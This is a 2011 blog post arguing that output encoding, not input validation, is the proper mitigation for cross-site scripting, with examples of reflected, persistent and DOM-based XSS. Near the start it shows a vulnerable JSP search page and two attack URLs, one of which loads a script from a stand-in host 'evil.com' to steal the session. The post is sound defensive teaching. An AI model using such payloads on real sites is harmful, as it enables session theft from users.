9.08.2011

XSS - Validation vs. Encoding

I seem to have sparked another one of those lively internet conversations that I tend to spark from time to time. This time, the topic of debate was on mitigating XSS. I posted a response to a series of articles that I have read lately that either imply or blatantly state that Input Validation is the proper way to mitigate XSS. I whole-heartedly disagree with this assertion.

What is Cross-Site Scripting
Personally, I have always thought this is a horrible name for this vulnerability. The attack is performed by exploiting a vulnerability local to the codebase of the application. The Cross-Site part of XSS is really about the impact of the vulnerability rather than the vulnerability itself. An attacker can leverage weak security on a vulnerable site to include a payload hosted on another site.

That being said; XSS can be defined as a vulnerability that occurs when an attacker is able to break out of a data context and execute arbitrary code using crafted data. More simply put, XSS is nothing more than a buzz-word for a specific type of Command Injection vulnerability. Let's examine:

<!-- /search.jsp -->
<div id="my-custom-div">
   Your search for ${request.getParameter("q")} returned '${results.size}' results
</div>

What could go wrong here?

http://my.server.com/search.jsp?q=<script>alert(document.cookie)</script>
http://my.server.com/search.jsp?q=<script src="http://evil.com/steal-session.js"></script>

These are some very naive attacks that can work. Also, notice - I have also illustrated the Cross-Site part of the Cross-Site Scripting vulnerability in my second example. This is a cross-site payload to a command injection vulnerability as the vulnerability is not the cross-site part of it at all, in fact; the script tag acts exactly as it is specified to.

Data vs Execution Context
This is a subject that has been covered a hundred million times before by people a lot smarter than me, so I will provide a brief summary on what this means in the context of XSS:

Legend: Execution Environment Data

HTML Context:
<command parameter="data" parameter="data">data<ommand>

Javascript Context:
command("data");
var var_name="data";

Style Context:
selector {
   attr: data;
   attr: command(data);
}

Highly Dilluted Context:
<command style="attr: command(data)" onclick="command('data')" param="data">data<command>

Now that we have that covered, let's move into each exhibit one by one.


Exhibit A: Standard Run-Of-The-Mill XSS
This is your mommy and daddy's XSS vector. The most common type of XSS there is on the web today and coincidentally the easiest to mitigate. This is the Reflective XSS that was not only the grand-daddy of all other XSS vectors but is still the most prevalent type of XSS issue that I find in the wild. This type of XSS is also illustrated perfectly in the above example.

By accepting untrusted input that can be modified by the end-user and rendering that input directly to the view we have created our vulnerability. An attacker can break out of the data context simply by embedding a command in the data being submitted.

While it is possible that a strict alpha-numeric whitelist validation approach could effectively mitigate the illustrated payloads; this is often not acceptable. I used the search results page as an example here for 2 specific reasons.

1) Search Results Pages are were most of these issues exist.
2) Search Engines have their own parsing engines and data vs. context rules.

If the whitelist is too strict, I won't be able to perform quality searches such as

q=mfg:"Audi"+model:"A4"+year:>2010+price:<25000


Validation simply doesn't work in this case - yes, input validation should still happen here prior to forwarding this untrusted data to a back-end service such as Solr however when rendering on the view you want this to be encoded in the correct context:

<!-- /search.jsp -->
<div id="my-custom-div">
   Your search for ${encodeForHTML(request.getParameter("q"))} returned '${results.size}' results
</div>

When the untrusted data gets rendered now, it becomes:

"Your search for mfg:"Audi" model:"A4" year:&gt;2010 price:&lt;25000"

Additionally, an attempted attack from above becomes:

"Your search for &lt;script&gt;alert(document.cookie);&lt;/script&gt;"


Exhibit B: Persistent XSS
Persistent XSS really isn't any different than reflective when it comes to mitigation. The primary difference between Reflective and Persistent XSS is that reflective XSS relies on crafting links or otherwise tricking a victim into submitting the payload to the application whereas persistent XSS has no such limitations. A victim only needs to visit a page that has previously been exploited and the application delivers the payload to the victim without any additional interaction from the attacker. This is an important distinction in the way the attacks are executed, however they are mitigated the same way, by using Output Encoding.

Exhibit C: DOM-Based XSS
DOM Based XSS is a really interesting vector both from the attack and mitigate perspectives. What makes DOM Based XSS so unique is that it all happens in the browser. The details of what DOM-XSS actually is are discussed ad-nauseum here and here so I will refrain from trying to explain the details of it here. But if we examine the DOM-XSS Prevention Cheatsheet (which I contributed to at the OWASP Summit 2011 in Lisbon) you will see that once again, Output Encoding is the clear answer to solving this problem. The difference here being that when dealing with DOM-XSS you are encoding with Javascript as opposed to using Server-Side encoding.

Exhibit D: Edge Cases and Uncommon Vectors
In the conversation, a couple of edge cases were brought up. The first one was in dealing with File Uploads. I have to assume that the vector in question was related to this Ha.ckers.org Post. If that is indeed the case, then there are a few ways to address the problem. Output Encoding will still absolutely solve the issue, as the image filename is rendered to the view, the filename - having been provided from an untrusted source initially (end-user) should be encoded as an html attribute value in the src attribute of the img tag. While I would suggest doing that anyhow, the correct mitigation here is to rename a file rather than using the filename supplied in the post headers when writing it to disk.

The second edge case to be brought up was json parsing. This vector is a DOM-XSS vector, but is really neither about encoding or validation. The problem occurs when someone uses eval to parse a json data payload rather than using the new json_parse() function that is supplied in all modern browsers and is back-ported for non-modern browsers.

The last and final vector that was discussed was untrusted javascript and/or jsonp. Untrusted javascript and jsonp should never be executed in the scope of the document. This is also neither a validation or encoding issue, as neither are an XSS issue. These vectors are all about trust, and untrusted code should never be executed in the same scope or context as trusted code. The correct way to mitigate data-theft via untrusted script inclusion or jsonp is to execute that code in a sandbox or closure. In a sandbox or closure you can limit the scope of the execution context using a whitelist approach. Gareth Heyes has created some great sandboxing implementations to help combat against these attack vectors as OWASP Projects

Closing Statements
While I could (and maybe should) go into greater detail in each one of these areas, my main point with this post was to express that while Input Validation is a good idea for many many reasons, it is not the answer to solve one of the most prevalent bugs on the interwebz. Output Encoding remains the best practice for mitigating these attacks and by claiming otherwise we are doing a disservice to developers that really want to write more secure code. 

Update 1:
James Jardine has posted an excellent follow-up to this post on his blog over at  http://www.jardinesoftware.net/2011/09/09/xss-validation-vs-encoding/